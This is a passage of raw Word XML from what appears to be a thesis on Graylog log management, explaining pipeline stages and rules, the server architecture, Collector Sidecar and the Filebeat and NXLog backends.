      <w:r w:rsidR="00C27956">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the following pseudo-script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>pipeline “My pipeline”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>stage 1 match all</w:t>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>rule “has firewall fields”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>rule “from firewall subnet”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>stage 2 match either</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C27956" w:rsidRPr="00C27956" w:rsidRDefault="00C27956" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>rule “geocode IPs”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>rule “anonymize source IPs”</w:t>
      </w:r>
      <w:r w:rsidR="00C27956" w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRPr="00C27956" w:rsidRDefault="00F216DD" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C27956">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F216DD" w:rsidRDefault="00C27956" w:rsidP="00F216DD">
      <w:r>
        <w:t>The script describes that the pipeline name is “My pipeline”, which has 2 stages those are “stage 1” and “stage 2”.  The stage’s condition for comparison is specified after the word “match”, which tells</w:t>
      </w:r>
      <w:r w:rsidR="00620473">
        <w:t xml:space="preserve"> the stage to compare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the characteristic of the current working log stream with the rule defined after the “rule” word. The condition “match all” defines that the stage only returns true if only all the rules specified in it return true, when compare with the current working log stream. The condition “match either” defines that the stage returns true when one of the rule comparison returns true.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRDefault="0033002B" w:rsidP="0033002B">
      <w:r>
        <w:t>Rules are the cornerstones of the processing pipeline, they contain the definitions for pipelines to know whether to change, enrich, route or drop the messages. Graylog supports a simple rule language for us to easily define the processing logic. Let’s consider a pseudo script defining rules, which are specified in the script of stages we have explained above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>rule “has firewall fields”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>has_field(“src_ip”) &amp;&amp; has_field(“dst_ip”)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRDefault="0033002B" w:rsidP="0033002B">
      <w:r>
        <w:t>And another rule is</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>rule “from firewall subnet”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>when</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>cidr_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>match(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>“10.10.10.0/24”, to_ip($message.g12_remote_ip))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRPr="009B04F7" w:rsidRDefault="0033002B" w:rsidP="009B04F7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B04F7">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033002B" w:rsidRDefault="0048196B" w:rsidP="0033002B">
      <w:r>
        <w:t>Simply written below the name of the rule is a word says “when” that is the opening of a Boolean expression for the condition underneath it. The next line is a phrase that performs the comparison for the rule, which we can consider as the heart of the rule. The first rule calls the function “has_field” and getting a string “src_ip”. The function will return true if there is a field named “src_ip” inside the message. In this comparison, rule “has firewall fields” wants the message</w:t>
      </w:r>
      <w:r w:rsidR="00845030">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contain both “src_ip” and “dst_ip” field. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C5BAA" w:rsidRDefault="008C5BAA" w:rsidP="0033002B">
      <w:r>
        <w:t xml:space="preserve">The second rule wants to check whether the network address 10.10.10.0 whose subnet mask is /24 matched the IP of the message that are process. The function “to_ip” convert the string that is the IP address which has been capture in the message. The phrase “$message” indicates the message that rule is working on, and the field “g12_remote_ip” is always included in the message by Graylog. The word “then” </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>defines the actions to be taken by rules. In this case, we do not specify any action since we just explain an example about the structure of rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00904D1E" w:rsidRDefault="0033002B" w:rsidP="0033002B">
      <w:r w:rsidRPr="00830CDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00904D1E" w:rsidRPr="00830CDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>For managing the log data</w:t>
      </w:r>
      <w:r w:rsidR="00904D1E">
        <w:t>, Graylog applies a working model as demonstrated in the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00904D1E" w:rsidRDefault="00904D1E" w:rsidP="00904D1E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52FF8F19" wp14:editId="31219969">
            <wp:extent cx="3410186" cy="3402418"/>
            <wp:effectExtent l="57150" t="57150" r="57150" b="64770"/>
            <wp:docPr id="3074" name="Picture 2" descr="../_images/architec_small_setup.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descr="../_images/architec_small_setup.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noGrp="1"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1188" cy="3413395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:effectLst>
                      <a:outerShdw blurRad="50800" dir="14400000">
                        <a:srgbClr val="000000">
                          <a:alpha val="40000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00904D1E" w:rsidRPr="00EA77C6" w:rsidRDefault="00904D1E" w:rsidP="00904D1E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc483834783"/>
      <w:bookmarkStart w:id="54" w:name="_Toc484886347"/>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog working model.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="00904D1E" w:rsidRPr="00EA77C6" w:rsidRDefault="00904D1E" w:rsidP="00904D1E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00EA77C6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/architecture.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00904D1E" w:rsidRDefault="00904D1E" w:rsidP="00904D1E">
      <w:r>
        <w:t xml:space="preserve">A Graylog server is a </w:t>
      </w:r>
      <w:r w:rsidR="00C352B0">
        <w:t xml:space="preserve">system that runs separately. It has a server for collecting log, a MongoDB database for storing log data and Elasticsearch Server for processing and searching for log contents. Graylog’s clients install an agent for interacting and sending log to the server, and an administrator of the system can config and setup the server via a Web GUI that was built into the Graylog server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C352B0" w:rsidRDefault="00C352B0" w:rsidP="00904D1E">
      <w:r>
        <w:t>First, we will get into the Graylog collector that is installed on the clients for collecting log. There are two collector program that Graylog supports for collecting and sending log, these are Graylog Collector Sidecar and Graylog Collector. Graylog Collector is the older version which has been developed since the beginning of Graylog. Now Graylog Collector</w:t>
      </w:r>
      <w:r w:rsidR="00830CDC">
        <w:t xml:space="preserve"> is deprecated and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has been replaced by Graylog Collector Sidecar, which is smaller, runs smoother and more stable. In this thesis concept, we use Graylog Collector Sidecar for collecting log from distributed log collector hardware. </w:t>
      </w:r>
      <w:r w:rsidR="00830CDC">
        <w:t>We would like not to present Graylog Collector since it is not supported anymore, otherwise, we will analyze a little about Graylog Collector Sidecar for knowing its operation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830CDC" w:rsidRDefault="00830CDC" w:rsidP="00904D1E">
      <w:r w:rsidRPr="00830CDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Graylog Collector Sidecar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a lightweight configuration management system for different log collectors, also called Backend </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="741301367"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Gra1 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(16)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve">. While the Graylog server acts as a centralized log collector system, the Graylog Collector Sidecar runs on the client machine for collecting log. </w:t>
      </w:r>
      <w:r w:rsidR="008625D0">
        <w:t xml:space="preserve">Graylog Collector Sidecar can be configured to run as an OS service (on Windows) or a daemon (on Linux). In a graphical way, the figure below draws a correlation between Graylog server and Graylog Collector Sidecar. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008625D0" w:rsidRDefault="008625D0" w:rsidP="008625D0">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="408513B6" wp14:editId="77B15C3A">
            <wp:extent cx="5581650" cy="36696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1650" cy="3669665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008625D0" w:rsidRPr="00EA77C6" w:rsidRDefault="008625D0" w:rsidP="00EF2B8A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc483834784"/>
      <w:bookmarkStart w:id="56" w:name="_Toc484886348"/>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> The correlation between Graylog server and Graylog Collector Sidecar.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="008625D0" w:rsidRPr="00EA77C6" w:rsidRDefault="008625D0" w:rsidP="008625D0">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA77C6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00EA77C6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>http://docs.graylog.org/en/2.2/pages/collector_sidecar.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008625D0" w:rsidRDefault="00EF2B8A" w:rsidP="008625D0">
      <w:r>
        <w:t xml:space="preserve">Graylog Collector Sidecar receives the configuration from Graylog server through a “Rest API”. </w:t>
      </w:r>
      <w:r w:rsidR="009B04F7">
        <w:t xml:space="preserve">Graylog Rest API is a set of API that is used for a Graylog server to manage its client. A Graylog client managed by Rest API could be a collector or another Graylog server which is work in cluster mode with this current Graylog server. We will talk about Graylog cluster later in a small section. After Graylog Collector Side connect to Rest API, it and Graylog server will exchange configuration, if the configuration is correct, Graylog server will accept and connect with the agent via this API through the open port 9000, with the specific URL is: </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="009B04F7" w:rsidRPr="00C00948">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;Graylog_server_IP&gt;:9000/api/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009B04F7">
        <w:t xml:space="preserve">. On the client side, Graylog Collector Sidecar is configured a method for sending log to the server, which we call a backend. The log backend can be NXLog or Winlogbeat (for Windows) and Filebeat (for Linux). </w:t>
      </w:r>
      <w:r w:rsidR="0031762B">
        <w:t xml:space="preserve">On the other side, Graylog server should be configure for supporting the appropriate backend that can work with the agent. In the concept of this thesis, we use Filebeat </w:t>
      </w:r>
      <w:r w:rsidR="0031762B">
        <w:lastRenderedPageBreak/>
        <w:t>for connecting the agent on our log hardware, since we configured it to run on Debian core Unix system, to the Graylog server. Therefore, to make this be straightforward, we would like to only explain the working concept of Filebeat comparing to NXLog, without discussing about Winlogbeat in any detail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22AC8" w:rsidRDefault="0031762B" w:rsidP="00D22AC8">
      <w:r>
        <w:t xml:space="preserve">NXLog and Filebeat are two programs that are together working to create the opensource log management solutions. </w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t>They both aim to support for opensource, m</w:t>
      </w:r>
      <w:r w:rsidR="00A8226C">
        <w:t>ulti</w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t>platform, lightweight, speed</w:t>
      </w:r>
      <w:r w:rsidR="00495982">
        <w:t>, reliability</w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t xml:space="preserve"> and high availability, those are features that all administrators who want to implement a log distributed system </w:t>
      </w:r>
      <w:r w:rsidR="00A8226C">
        <w:t>must</w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t xml:space="preserve"> consider.</w:t>
      </w:r>
      <w:r w:rsidR="00A8226C">
        <w:t xml:space="preserve"> They also support many platforms presenting in any data center and information system. They both consider about the way they are deployed on the client’s machines, how message travels from the clients to any kind of log collector server that are commonly used. </w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t>But the</w:t>
      </w:r>
      <w:r w:rsidR="00A8226C">
        <w:t>re are two</w:t>
      </w:r>
      <w:r w:rsidR="00D22AC8">
        <w:t xml:space="preserve"> important difference</w:t>
      </w:r>
